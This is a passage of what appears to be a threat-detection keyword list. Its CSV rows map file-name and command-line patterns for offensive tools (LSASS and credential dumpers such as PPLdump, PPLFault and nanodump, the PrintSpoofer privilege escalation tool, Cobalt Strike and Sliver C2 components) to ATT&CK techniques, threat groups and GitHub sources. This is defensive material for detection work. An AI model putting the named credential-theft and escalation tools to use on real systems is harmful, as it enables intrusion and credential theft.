A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*PPLBlade.dmp*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*PPLBlade.exe*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*PPLBlade-main.*,offensive_tool_keyword,PPLBlade,Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.,T1003.001 - T1027.004 - T1560.001 - T1039 - T1570,TA0006 - TA0005 - TA0010 - TA0003,N/A,N/A,Credential Access - Data Exfiltration,https://github.com/tastypepperoni/PPLBlade,1,1,N/A,10,4,324,36,2023-08-30T07:59:51Z,2023-08-29T19:36:04Z -*ppldump *,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,0,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*PPLdump*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*PPLdump.exe*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*ppldump.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*PPLDump_BOF.*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*ppldump_embedded*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*PPLdump64.exe*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*PPLdumpDll*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*PPLFault.*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential 
Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*pplfault.cna*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFault.exe*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLFaultDumpBOF*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFault-Localhost-SMB.ps1*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLFaultPayload.dll*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z 
-*PPLFaultPayload.dll*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLFaultTemp*,offensive_tool_keyword,cobaltstrike,Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.,T1055 - T1078.003,TA0002 - TA0006,N/A,N/A,Credential Access,https://github.com/trustedsec/PPLFaultDumpBOF,1,1,N/A,N/A,2,115,11,2023-05-17T12:57:20Z,2023-05-16T13:02:22Z -*PPLFaultTemp*,offensive_tool_keyword,PPLFault,Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.,T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/gabriellandau/PPLFault,1,1,N/A,N/A,5,410,66,2023-10-03T20:00:34Z,2022-09-22T19:39:24Z -*PPLKiller.exe*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PPLKiller.sln*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PPLKiller.vcxproj*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PPLKiller-master*,offensive_tool_keyword,PPLKiller,Tool to bypass LSA Protection (aka Protected Process Light),T1547.002 - T1558.003,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/RedCursorSecurityConsulting/PPLKiller,1,1,N/A,10,8,744,127,2022-12-04T23:38:31Z,2020-07-06T10:11:49Z -*PppEWCIgXbsepIwnuRIHtQLC*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ppypykatz.py*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*praetorian.antihacker*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*praetorian-inc/gato*,offensive_tool_keyword,gato,GitHub Self-Hosted Runner Enumeration and Attack Tool,T1083 - T1087 - T1081,TA0006 - TA0007,N/A,N/A,Reconnaissance,https://github.com/praetorian-inc/gato,1,1,N/A,N/A,3,263,24,2023-07-27T15:15:32Z,2023-01-06T15:43:27Z -*praetorian-inc/noseyparker*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -*praetorian-inc/PortBender*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*pre2k auth * --dc-ip *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*prepare_ppl_command_line*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*prepareResponseForHiddenAPICall*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*PrimusC2-main.zip*,offensive_tool_keyword,primusC2,another C2 framework,T1090 - T1071,TA0011 - TA0002,N/A,N/A,C2,https://github.com/Primusinterp/PrimusC2,1,1,N/A,10,10,42,4,2023-08-21T04:05:48Z,2023-04-19T10:59:30Z -*print_shtinkering_crash_location*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,1,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*printerbug.py *:*@* *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PrinterNotifyPotato *,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,0,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*PrinterNotifyPotato.*,offensive_tool_keyword,DCOMPotato,Service DCOM Object and SeImpersonatePrivilege abuse.,T1548.002 - T1134.002,TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/DCOMPotato,1,1,N/A,10,4,326,46,2022-12-09T01:57:53Z,2022-12-08T14:56:13Z -*PrintNightmare.*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,0,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*printnightmare_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*printspoofer 
-Command*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*PrintSpoofer-*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*PrintSpoofer.*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,1,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*PrintSpoofer.cpp*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer.cpp*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,0,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer.exe*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*printspoofer.exe*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/daem0nc0re/PrivFu/,1,1,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*printspoofer.py*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*PrintSpoofer.sln*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer_x64.exe*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*PrintSpoofer32.exe*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer32.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer64.exe*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege 
Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer64.exe*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer-master*,offensive_tool_keyword,PrintSpoofer,Abusing Impersonation Privileges on Windows 10 and Server 2019,T1548.002 - T1055.001 - T1055.002,TA0005 - TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*PrintSpoofer-master*,offensive_tool_keyword,printspoofer,Abusing impersonation privileges through the Printer Bug,T1134 - T1003 - T1055,TA0004 - TA0003 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrintSpoofer,1,1,N/A,10,10,1569,321,2020-09-10T17:49:41Z,2020-04-28T08:26:29Z -*Priv Esc Check Bof*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*priv/priv_windows.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*privcheck.cna*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows 
